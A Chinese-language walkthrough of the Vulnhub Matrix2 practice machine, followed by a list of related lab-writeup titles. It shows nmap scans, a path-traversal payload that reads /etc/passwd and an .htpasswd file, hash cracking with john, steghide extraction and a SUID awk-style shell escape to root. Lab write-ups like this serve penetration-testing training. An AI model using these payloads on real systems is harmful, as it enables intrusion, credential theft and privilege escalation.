Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova

环境: VMware 15虚拟机软件
Matrix2靶机IP地址: 192.168.220.159
Kali的IP地址: 192.168.220.155

Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155

ip addr


使用nmap扫描192.168.220.0网段存活的主机,发现Matrix2靶机的IP地址为:192.168.220.159

nmap -sP -T4 192.168.220.0/24 -oN nmap220.sP


使用nmap全面扫描Matrix2靶机并查看已开放的端口,发现已开放80、1337、12320、12321、12322端口

nmap -A -T4 -p- 192.168.220.159 -oN nmap159.A



分别打开相关端口查看页面

http://192.168.220.159/

 https://192.168.220.159:1337/

https://192.168.220.159:12320/

https://192.168.220.159:12321/

https://192.168.220.159:12322/


在12322端口下,发现一个file_view.php文件,但在robots.txt文件发现禁用了file_view.php文件,怀疑存在任意文件包含漏洞

https://192.168.220.159:12322/robots.txt


https://192.168.220.159:12322/file_view.php

使用BurpSuite抓取数据包,使用POST传参,发现可以包含任意文件,查看/etc/passwd文件

https://192.168.220.159:12322/file_view.php
file=../../../../../../../../../etc/passwd


网站是使用nginx搭建的,查看nginx的配置文件,发现了一个p4ss文件夹比较可疑

file=../../../../../../../../../etc/nginx/sites-available/default
auth_basic_user_file /var/www/p4ss/.htpasswd;


打开p4ss文件夹下的.htpasswd文件发现用户Tr1n17y及加密后的密码

Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0


使用john工具爆破,得到密码admin

john hash.txt
Tr1n17y:admin


打开端口1337的网页登录用户,并查看源码发现隐藏了一张图片h1dd3n.jpg

https://192.168.220.159:1337/



打开图片并保存到本地

https://192.168.220.159:1337/h1dd3n.jpg


h1dd3n.jpg图片使用了隐写,使用steghide工具将隐写的文本导出,密码是:n30

steghide --extract -sf h1dd3n.jpg
P4$$w0rd


打开12320端口的靶机控制台,使用n30用户及密码登录

https://192.168.220.159:12320/
n30/ P4$$w0rd


查看具有suid权限的命令,发现morpheus具体suid权限,可以借此提权

find / -perm -u=s -type f 2>/dev/null


使用以下命令提到root权限,并找到隐藏的flag

morpheus 'BEGIN {system("/bin/sh")}'

Vulnhub靶机实战——Matrix2相关推荐

  1. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  2. Vulnhub靶机实战——DC-8

    靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...

  3. Vulnhub靶机实战——DC-5

    靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...

  4. 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】

    靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...

  5. 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】

    靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...

  6. Vulnhub靶机实战——Matrix3

    下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192 ...

  7. Vulnhub靶机实战——DC-3

    靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.co ...

  8. DC-5 vulnhub靶机实战

    首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...

  9. Vulnhub靶机实战-Forensics

    声明 好好学习,天天向上 搭建 vmware打开,网络和攻击机一样,桥接模式 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.152 -p 1 ...

最新文章

  1. spring+mybatis事务的readonly属性无效
  2. 谁说AI无用?疫情下,AI已经代替人类做了很多...
  3. vue.js项目文件搭建
  4. mysql 备份工具xtrabackup全备与还原图解
  5. python取反函数_Python优雅的反函数int(string,base)
  6. final const java_Java中的final关键字 与 C#中的const, readonly关键字
  7. Java对象都是在堆上分配空间吗?答案竟然是...
  8. C语言 求sin(x)的近似值
  9. go:linkname
  10. MySQL误删数据?快速恢复指南来了!
  11. js小数运算出现多为小数问题_js小数计算小数点后显示多位小数的实现方法
  12. python usb通信测试
  13. ORBSLAM3整体框架
  14. 量子计算机王,王正汉|量子计算机:下一轮工业革命的引擎
  15. 《持续集成实践指南》第3章 Gitlab基本配置与使用
  16. 第九届河南省程序设计大赛-NYOJ-1276(搜索batter)
  17. H5微信授权登录后点击返回出现循环登录无法退出问题
  18. 大盘下跌时,如何做空股市,继续赚钱?
  19. 虚拟自动取款机ATM设计(C语言)
  20. 【Log】(二)Java 中的日志框架 JCL、SLF

热门文章

  1. java 修改word_Java 修改/替换Word批注
  2. 几句话直观理解java中Scanner类的next()、nextLine()、nextInt()
  3. excel读取mysql数据库_我有一个mysql数据库,现在想通过excel电子表格读取里面的数据,需要怎么操作?...
  4. 中年人可以学计算机吗,中老年学电脑的好处
  5. 对提取的目标轮廓上色
  6. fruitstrap安装app
  7. 以PDF转DjVu为例分析软件和人工转换的区别
  8. 就打一个小补丁?Win 10一周年更新版亮相
  9. PSP dev lesson 05
  10. TMS-EEG概念介绍